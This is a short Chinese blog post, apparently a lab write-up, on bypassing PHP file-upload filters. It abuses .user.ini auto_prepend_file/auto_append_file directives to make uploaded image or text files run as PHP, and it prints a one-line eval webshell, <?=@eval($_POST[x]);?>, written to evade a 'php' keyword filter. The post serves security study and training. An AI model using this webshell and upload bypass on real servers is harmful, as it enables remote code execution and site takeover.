文件上传--php user.ini详解

6FqvcajNhQJV 12天前 22 0

网络安全

文件上传

参考文档：https://www.php.net/manual/zh/configuration.file.per-user.php

如果你的 PHP 以模块化运行在 Apache 里，则用 .htaccess 文件有同样效果。

auto_prepend_file 表示在每个PHP脚本之前自动加载指定的文件。该文件的内容将被插入到原始脚本的顶部。

auto_prepend_file="shell.png"

auto_append_file 这个是指内容添加到文末，如果有exit会无法调用到

文件上传一

修改后缀--失败

大小写，php3等等--没有显示错误，上传成功

尝试访问图片--没有被解析，下载到了本地

尝试00截断--失败

使用.user.ini 使用auto_prepend_file="shell.png"

上传shell.png

成功

文件上传二：

上传一个普通的png文件：发现路径

上传.user.ini文件使用 auto_append_file="1.txt"

上传1.txt

上传失败疑似是过滤php，使用简写<?=@eval($_POST[x]);?>

成功

【版权声明】本文内容来自摩杜云社区用户原创、第三方投稿、转载，内容版权归原作者所有。本网站的目的在于传递更多信息，不拥有版权，亦不承担相应法律责任。如果您发现本社区中有涉嫌抄袭的内容，欢迎发送邮件进行举报，并提供相关证据，一经查实，本社区将立刻删除涉嫌侵权内容，举报邮箱： cloudbbs@moduyun.com

上一篇： java代码审计-某酒店管理系统下一篇： ssrf-基于Pikachu的学习

分享：

最后一次编辑于 12天前 0

暂无评论

推荐阅读

不安全的URL跳转(Pikachu)

5NWiQFAVeqgX 3天前 10 0 0 网络安全

RCE(Pikachu)

5NWiQFAVeqgX 3天前 5 0 0 网络安全

Webshell流量分析之菜刀Chopper&蚁剑AntSword

Q68mX1P3tSGz 3天前 6 0 0 网络安全

记一些CISP-PTE题目解析

pTtIhLb24H2d 3天前 10 0 0 网络安全

越权漏洞(Pikachu)

5NWiQFAVeqgX 3天前 8 0 0 网络安全

文件包含(Pikachu)

5NWiQFAVeqgX 3天前 9 0 0 网络安全

敏感信息泄露(Pikachu)

5NWiQFAVeqgX 3天前 9 0 0 网络安全

不安全的文件上传(Pikachu)

5NWiQFAVeqgX 3天前 10 0 0 网络安全

Weblogic T3反序列化漏洞（CVE-2018-2628）

Q68mX1P3tSGz 2天前 15 0 0 网络安全

以数字守护汉字！天翼云TeleDB数据库获GB 18030最高级别认证！

1H97ZBKLEqYv 3天前 9 0 0 网络安全

MJUCTF—WP

OKgNPeBk991j 2天前 13 0 0 网络安全

Stratum挖矿协议&XMR挖矿流量分析

Q68mX1P3tSGz 3天前 9 0 0 网络安全

应急响应web1

rKgO6TN7xbYO 3天前 8 0 0 网络安全

文件处理漏洞--文件上传

6FqvcajNhQJV 3天前 9 0 0 网络安全

LoRa与NB-IoT两大低功耗通信技术对比

bjWM7EoKUTkK 3天前 8 0 0 网络安全

流量特征提取工具NFStream

Q68mX1P3tSGz 3天前 8 0 0 网络安全

SQL注入(pikachu)

5NWiQFAVeqgX 3天前 7 0 0 网络安全

CSRF(Pikachu靶场练习)

5NWiQFAVeqgX 3天前 8 0 0 网络安全

XXE漏洞(Pikachu)

5NWiQFAVeqgX 3天前 10 0 0 网络安全

PHP反序列化(Pikachu)

5NWiQFAVeqgX 3天前 8 0 0 网络安全

6FqvcajNhQJV

作者其他文章更多

文件处理漏洞--文件上传

2024-05-17

文件上传--php user.ini详解

2024-05-08

强大的.access

2024-05-08

JAVA基础-流程控制、字符串

2024-04-18

最新推荐更多

MJUCTF—WP

2024-05-18

Weblogic T3反序列化漏洞（CVE-2018-2628）

2024-05-18

文件处理漏洞--文件上传

2024-05-17

应急响应web1

2024-05-17

Stratum挖矿协议&XMR挖矿流量分析

2024-05-17

以数字守护汉字！天翼云TeleDB数据库获GB 18030最高级别认证！

2024-05-17

CSRF(Pikachu靶场练习)

2024-05-17

SQL注入(pikachu)

2024-05-17

流量特征提取工具NFStream

2024-05-17

LoRa与NB-IoT两大低功耗通信技术对比

2024-05-17

记一些CISP-PTE题目解析

2024-05-17

Webshell流量分析之菜刀Chopper&蚁剑AntSword

2024-05-17

RCE(Pikachu)

2024-05-17

不安全的URL跳转(Pikachu)

2024-05-17

不安全的文件上传(Pikachu)

2024-05-17

敏感信息泄露(Pikachu)

2024-05-17

文件包含(Pikachu)

2024-05-17

越权漏洞(Pikachu)

2024-05-17

PHP反序列化(Pikachu)

2024-05-17

XXE漏洞(Pikachu)

2024-05-17